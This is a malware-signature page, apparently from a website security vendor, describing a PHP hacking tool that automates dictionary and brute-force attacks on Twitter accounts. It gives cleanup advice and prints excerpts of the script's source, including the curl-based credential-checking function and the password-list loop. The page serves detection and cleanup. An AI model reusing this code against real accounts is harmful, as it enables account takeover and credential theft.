Malware Signatures

  1. Home
  2. Malware Signatures
  3. php.hacktool.twitterbruteforce.001

php.hacktool.twitterbruteforce.001

As it name suggests, Twitter Brute Force script helps automate hacking Twitter accounts. It provides a simple interface where you can choose a Twitter account to hack and the mode of the attack: dictionary or brute force.
In case of a dictionary attack this script tries to varios passwords specified in the passwords.txt (usually) files. The brute force mode of the attack is poorly implemented in current versions of the script and can hardly hack anything.

Affecting

Any servers with enabled PHP

Cleanup

Delete the malicious script and passwords.txt file. Scan your server for other types of malware and specifically for backdoors.
You can also sign up with us and let our team remove the malware for you.

Dump

... excerpts ....

/////////////////////////////////////////////////////
////Twitter Brute Force By Mauritania Attacker//////
///////////////////////////////////////////////////

///////////////////////////////////////////////////
////Changing Description won't make you the Coder/
/////////////////////////////////////////////////

////////////////////////////////////////////////////////////////////////////
# This script was created to Brute Force Twitter Logins,#
#it Uses CURL and 2 Methods of Login attacks (Brute Force and Dictionary) #
///////////////////////////////////////////////////////////////////////////

$dic ="passwords.txt";
//////////////////////////////////////////////////////////////////////////

...

// Sets variables and retrives twitter error for comparing
if(isset($_POST['attack']) && isset($_POST['username'])) {
$username = $_POST['username'];
$headers = array(
"Host: stream.twitter.com",
"User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:23.0) Gecko/20100101 Firefox/23.0",
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3",
"Accept-Encoding: text", # No gzip, it only clutters your code!
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7",
"Date: ".date(DATE_RFC822)
);
$c = curl_init('https://stream.twitter.com/1/statuses/filter.json');

...

if($_POST['attack'] == "dictionary") {
$Dictionary = file("$dic");
for ($Position = 0; $Position < count($Dictionary); $Position++) {
$Dictionary[$Position] = str_replace("rn", "", $Dictionary[$Position]);
if(check_correct($username, $Dictionary[$Position])) {

...

// Function for checking whether the username and password are correct
function check_correct($username, $password)
{
global $wrong, $headers;
$c = curl_init('https://'.$username.':'.$password.'@stream.twitter.com/1/statuses/filter.json');
curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication
curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output!
curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1);
curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised
$str = curl_exec($c); // Get it
curl_close($c);
if($str != $wrong) {return true;}
else {return false;}
}